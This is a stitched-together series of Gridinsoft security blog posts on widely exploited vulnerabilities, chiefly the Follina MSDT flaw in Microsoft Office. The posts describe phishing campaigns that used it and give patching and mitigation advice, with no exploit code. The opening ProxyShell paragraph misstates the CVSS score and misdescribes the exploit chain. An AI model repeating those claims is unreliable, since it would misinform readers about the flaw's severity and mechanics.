Top Vulnerabilities 2023

According to the cybersecurity report in 2023, the previously known vulnerabilities reported over the past three years may cause concern again. Thus, in 24 percent of all cyberattacks, cybercriminals used vulnerabilities known in 2022. In second place are vulnerabilities known in 2021, accounting for 18%. That, by the way, totally repels any opinion that claims uselessness of updating and using security tools. Having all of that onboard, you will cut off over 40% of all possible attack vectors. But now, let’s have a peek into the most widespread exploits.

ProxyShell

ProxyShell, known as CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, and CVSS severity rating of 3.1, is a chain of attacks that exploits three vulnerabilities in Microsoft Exchange Server – ProxyShell, ProxyLogon, and ProxyNotShell. Using these vulnerabilities, attackers who are not authenticated can remotely execute code on vulnerable servers. Although these vulnerabilities were discovered and patched in 2021, they are still the most exploited and often lead to significant security breaches.

Follina in Microsoft Office

Recently, Microsoft has disabled the ability to execute macros in documents from external sources by default. However, attackers have not stopped them, and they use special .docx and .rtf documents to download and execute malicious code. To do this, they exploit the Follina vulnerability (CVE-2022-30190 and CVSS severity rating of 7.8) in unpatched systems to deploy Qbot or other Remote Access Trojans. It allows malicious code to run even if macros are disabled or the document is protected, making Follina one of the most commonly used vulnerabilities discovered in 2022.

Fortinet

Two critical bugs were reported in Fortinet products in October and December 2022 (CVSS score: 9.6 and 9.3). These bugs allow attackers who fail authentication to execute arbitrary code using specially crafted queries. However, even though the company has issued updates and CISA has warned of significant risk to federal organizations, as of early 2023, 18% of organizations were victims of the CVE-2022-40684 vulnerability exploit attack.

Causes

Experts note that attackers often exploit Remote Code Execution (RCE) vulnerabilities and Remote Desktop Protocol services left open to gain access to the network and deploy malicious code. However, many organizations do not use protections on servers for fear of performance degradation. Moreover, security and network equipment vendors often use admin/password as the default login combination. Even worse, some users keep this combination the same the first time they configure it, which makes life easier for an intruder.

How to prevent

Fortunately, you can fix that. Therefore, I’ve put together some tips below that you can follow to reduce the chance of negative consequences:

• Install the latest updates. Since Microsoft regularly releases patches vulnerabilities as part of its monthly security updates, we strongly recommend that you do not ignore these updates. This also applies to other products like Microsoft Office and Fortinet software.
• Change server settings. To restrict access to Exchange virtual directories, you can change server settings to limit access to virtual directories from the internal network only.
• Review the audit log. This will help you detect attempted attacks and take quick action to prevent them. Also, ensure that the audit logs are correctly configured to record enough information about events on the server.
• Train your employees. Educating users on security fundamentals is equally important, such as recognizing phishing and never opening suspicious links or email attachments. It’s also important not to share sensitive data upon request.
• Implement strict security policies and enforce them. This may include prohibiting using personal devices for work, including smartphones, tablets, and laptops unless they meet your security standards.
• Limit access to the configuration interface to only authenticated users with the necessary permissions. It will help prevent unauthorized access to the device settings.
• Use additional security measures such as multi-factor authentication (MFA) to protect access to the device. This will add an extra layer of security.
• Use solutions like Secure Access Service Edge (SASE). SASE allows multiple security features such as authentication, authorization, threat protection, and network and application access features such as virtual private networks (VPNs) and routing to combine into a single system to provide more effective and convenient security for the corporate network.

Conclusion

In the digital age, the security of software applications and systems has become increasingly crucial as malicious actors constantly look for vulnerabilities to exploit. News of cyberattacks is in the spotlight, and the severity of attacks continues to grow, so everyone needs to strengthen their organization’s security through education, awareness, and training. Cybersecurity threats permeate new environments as technology evolves, but many threats will remain the same. Therefore, continuous assessment of processes, people, and systems is necessary for organizations to be prepared and operationally resilient. By using the knowledge of ethical hackers, conducting regular testing, and using automation, organizations can be better ready for potential threats.

The post Top 3 Vulnerabilities of 2023: How to Block and Prevent appeared first on Gridinsoft Blog.

According to experts, the APT28 hacker group (Strontium, Fancy Bear and Sofacy) sends out emails with a malicious document called “Nuclear Terrorism Is a Real Threat.rtf”.

The hackers chose this topic to encourage the recipient to open the document, as fear of a potential nuclear attack is common among Ukrainians.

Let me remind you that we reported that Hacker groups split up: some of them support Russia, others Ukraine, and also that War in Ukraine triggered a Stream of amateurish ransomware.

The RTF document exploits the CVE-2022-30190 (Follina) vulnerability to download and run the CredoMap malware (docx.exe) on the victim’s device.

According to a Malwarebytes report, the payload is an infostealer that steals credentials and cookies from Chrome, Edge, and Firefox browsers. The software then extracts the stolen data using the IMAP email protocol and sends everything to the C2 address, which is hosted on an abandoned site in Dubai.

CERT-UA also identified another attacker campaign called UAC-0098 using CVE-2022-30190.

CERT-UA reported that the threat actor used a DOCX file named “Penalty.docx” and the payload was received from the remote resource is a Cobalt Strike beacon (ked.dll) with the latest compilation date.

The e-mails sent out allegedly come from the State Tax Service of Ukraine.

Due to Russia’s invasion of Ukraine, many citizens have temporarily stopped paying taxes to the state, so the bait can be effective against many Ukrainians.

CERT-UA advised employees of organizations to remain vigilant about phishing emails as the number of spear phishing attacks remains high.

The post Russian Hackers Use Follina Vulnerability to Attack Users in Ukraine appeared first on Gridinsoft Blog.

As a reminder, Follina (CVE-2022-30190) is a remote code execution issue in the Microsoft Windows Support Diagnostic Tool (MSDT) and affects all versions of Windows that receive security updates (that is, Windows 7 and above and Server 2008 and above). For several weeks now, the vulnerability has been under active attack by hackers.

Recall also that we wrote that, for example, Trojan Qbot Took Advantage of the Famous Follina Vulnerability.

Attackers could use 0-day to randomly execute code with the privileges of the calling application, using the bug to install programs, view, modify or delete data, and create new Windows accounts (depending on the rights of the compromised user).

And while recent updates won’t prevent Microsoft Office from automatically loading URI handlers without user interaction, they do block PowerShell injections, shutting down this attack vector.

In addition to the long-awaited patch for Follina, Microsoft developers have submitted fixes for another 55 vulnerabilities, three of which were classified as “critical” because they allow arbitrary code execution remotely: CVE-2022-30136 (RCE on Windows NFS), CVE-2022-30163 ( RCE on Windows Hyper-V) and CVE-2022-30139 (RCE on Windows LDAP). Five more bugs have been fixed separately in the Microsoft Edge browser.

It is worth noting that the most serious of the three critical vulnerabilities (CVE-2022-30136) received a score of 9.8 points out of 10 possible on the CVSS scale. The issue affects the Windows Network File System (NFS). Microsoft says that exploitation of this bug by hackers is “likely”, and explains that this can happen if an attacker already infiltrating the victim’s network makes an unauthenticated, specially crafted call to the NFS service for remote code execution.

The post Microsoft Fixed Follina Vulnerability and 55 Other Bugs appeared first on Gridinsoft Blog.

Let me remind you that the discovery of Follina became known at the end of May, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem.

The vulnerability has been tracked under the identifier CVE-2022-30190 and is known to be exploitable to execute arbitrary code through the normal opening of a Word document or preview in File Explorer, resorting to executing malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT).

The bug affects all versions of Windows that receive security updates, that is, Windows 7 and later, as well as Server 2008 and later.

Let me remind you that we wrote that Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster.

Previously, experts have already warned that the vulnerability is exploited by Chinese hackers, and it is also being used to attack European governments and municipal authorities in the United States. Now, Proofpoint experts write that even the Qbot malware has begun using malicious Microsoft Office documents (.docx) to abuse CVE-2022-30190 and infect recipients of such phishing emails.

To attack, hackers use emails with HTML attachments that download ZIP archives containing images in IMG format. Inside such an image, the victim will find a DLL file, Word, and a shortcut.

Whereas the shortcut file directly downloads the Qbot DLL already present in the image, the empty .docx document contacts an external server to download an HTML file that exploits the Follina vulnerability to run PowerShell code, which in turn downloads and executes another Qbot DLL payload.

Indicators of Compromise related to this campaign can be found here.

The researchers believe that the use of two different infection methods indicates that hackers are conducting an A/B testing campaign to evaluate which tactics will give the best results.

The post Trojan Qbot Took Advantage of the Famous Follina Vulnerability appeared first on Gridinsoft Blog.

Researchers warn that European governments and municipalities in the US have been targeted by a phishing campaign using malicious RTF documents.

Let me remind you that the discovery of Follina became known at the end of May, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem.

The vulnerability has been tracked under the identifier CVE-2022-30190 and is known to be exploitable to execute arbitrary code through the normal opening of a Word document or preview in File Explorer, resorting to executing malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT).

The bug affects all versions of Windows that receive security updates, i.e. Windows 7 and later, as well as Server 2008 and later.

Worse, it is noted that the vulnerability is in many ways similar to the PrintNightmare problem, which Microsoft could not fix for quite some time. The fact is that Follina also pulled the discovery of other bugs, the consequences of exploiting which can be no less serious.

We have already written that Chinese hackers are actively using the fresh 0-day, and experts warned that soon there will be more such attacks. Unfortunately, the predictions of the experts turned out to be correct: now Proofpoint analysts report that they have discovered a phishing campaign aimed at government agencies in Europe and municipal authorities in the United States, which in total affected at least 10 of the company’s customers. According to experts, government hackers are behind these attacks.

To deceive potential victims and force them to open a decoy document, the attackers used the theme of a pay increase. Opening the document resulted in the deployment of a Powershell script that checked to see if the system was a virtual machine and was then used to steal information from multiple browsers, email clients, and file services, as well as collect system information, after transferring the data to a server controlled by hackers.

According to Bleeping Computer, the payload collected a lot of data from a wide variety of applications, including:

1. passwords from browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Yandex, Vivaldi, CentBrowser, Comodo, CheDot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc and AVAST Browser;
2. data from other applications: Mozilla Thunderbird, Netsarang session files, Windows Live Mail contacts, Filezilla passwords, ToDesk configuration file, WeChat, Oray SunLogin RemoteClient, MailMaster, ServU, Putty, FTP123, WinSCP, RAdmin, Microsoft Office, Navicat;
3. system information: computer information, list of usernames, Windows domain information.

Most of the attacks are reported to have been in the United States, as well as Brazil, Mexico and Russia.

Since there is still no patch for Follina, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT protocol, which attackers use to launch debuggers and execute code on vulnerable systems. It is also officially recommended to disable file previews in Windows Explorer, because the attack is possible in this way as well.

In the absence of an official patch, an unofficial one has already appeared, from 0patch. Let me remind you that 0patch is a platform designed just for such situations, that is, fixing 0-day and other unpatched vulnerabilities, to support products that are no longer supported by manufacturers, custom software, and so on.

Unofficial patches are provided for Windows 11 v21H2, Windows 10 (1803 to 21H2), Windows 7 and Windows Server 2008 R2. Moreover, instead of disabling MSDT recommended by Microsoft, 0patch specialists added additional cleaning of the path provided by the user, which also helps to avoid exploiting the bug.

Meanwhile, information security experts are already beginning to criticize Microsoft for its sluggishness and lack of fixes.

The post Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster appeared first on Gridinsoft Blog.

Let me remind you that the discovery of Follina became known a few days ago, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem. The vulnerability is now tracked as CVE-2022-30190 and is known to be exploitable through normal Word document opening or File Explorer preview, using malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT) to execute.

The bug affects all versions of Windows that receive security updates, that is, Windows 7 and later, as well as Server 2008 and later.

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products.

Previously, experts have already reported that the discovery of Follina is a very worrying signal, as the vulnerability opens up a new attack vector using Microsoft Office. The fact is that the bug works without elevated privileges, allows bypassing Windows Defender and does not require the activation of macros to execute binaries or scripts.

As Proofpoint experts now say, the Chinese “government” hackers from the TA413 group have already taken advantage of the Follina problem, targeting their attacks on the international Tibetan community.

Attackers distribute ZIP archives to victims that contain malicious Word documents designed to attack CVE-2022-30190. The decoys are disguised as messages from the Central Tibetan Administration and use the tibet-gov.web[.]app domain.

Well-known information security researcher MalwareHunterTeam also writes that he found DOCX documents with file names in Chinese that are used to deliver malicious payloads through the http://coolrat[.]xyz domain, including malware to steal passwords.

Since there is no patch for Follina yet, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT URI protocol, which attackers use to launch debuggers and execute code on vulnerable systems. It is also recommended to disable file preview in Windows Explorer, because the attack is possible in this way as well.

The post Chinese Hackers Attack Fresh 0-day Follina Vulnerability appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products, and also that Microsoft Has Not Fully Coped with PetitPotam Attacks in Windows NTLM Relay.

The discovery of Follina is a very worrying sign, as the vulnerability opens up a new attack vector using Microsoft Office. The fact is that the bug works without elevated privileges, allowing to bypass Windows Defender and does not require the activation of macros to execute binaries or scripts.

The first malicious Word document intended to exploit this bug was discovered by the information security specialist nao_sec, who spotted a file on VirusTotal downloaded from a Belarusian IP address. Apparently, attacks on this problem began as early as April 2022, and hackers used fake interview invitations and sexual extortion as baits for their victims.

Well-known information security expert Kevin Beaumont studied the find of his colleague, deciphered the code and explained in his blog that this is a command line string that Microsoft Word executes using MSDT, even if macros are disabled. Beaumont elaborates that a malicious Word document uses a remote template feature to download an HTML file from a server. This HTML then uses the Microsoft MS-MSDT URI scheme to load additional code and execute the PowerShell code.

It is noted that this activates the Protected View feature in Microsoft Office, designed to warn about files from potentially unsafe sources, but, according to Beaumont, this warning can be bypassed by using a Rich Text Format (RTF) file. Thus, malicious code can work “even without opening the document, that is, through the preview in Explorer.”

According to Bleeping Computer, many information security specialists have already studied the found malicious document and successfully reproduced the exploit on several versions of Microsoft Office. As a result, the researchers confirmed the presence of a vulnerability in Office 2013, 2016, Office Pro Plus April version (Windows 11 with May updates) and Office 2021 version with all patches.

According to experts, an attacker can use such an exploit to access various places on the victim’s network. Depending on the payload, the attacker can collect password hashes from the victim’s Windows machines, which can be useful for further post-exploitation.

A detailed technical description of the exploit is already available on the Huntress blog.

Interestingly, it now turns out that the Follina vulnerability was discovered back in April of this year, and Microsoft has already been notified about it.

So, according to screenshots posted by crazyman, a member of the Shadow Chaser Group (an association of college students engaged in the search and analysis of APT), Microsoft was informed about the vulnerability, but the company considered it to be “a non-security issue.” Microsoft argued that msdt.exe was indeed running, but it required a password to run, and the company was unable to reproduce the exploit.

Now Microsoft has acknowledged that the problem is still related to security: the vulnerability has already received the identifier CVE-2022-30190, and it is reported that the bug affects all versions of Windows that receive security updates, that is, Windows 7 and newer, as well as Server 2008 and newer.

Since there is no patch yet, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT URI protocol, which attackers use to launch debuggers and execute code on vulnerable systems.

Although Microsoft Defender version 1.367.719.0 is already able to detect the use of a vulnerability by signatures, and Protected View and Application Guard in Microsoft Office should block attacks, security experts warn that protective functions are powerless if the attack is carried out through a preview in Explorer, and not through opening a document. Therefore, it is also recommended to disable the preview in Windows Explorer.

The post Attackers Are Already Exploiting the Fresh 0-day Follina Bug in Microsoft Office appeared first on Gridinsoft Blog.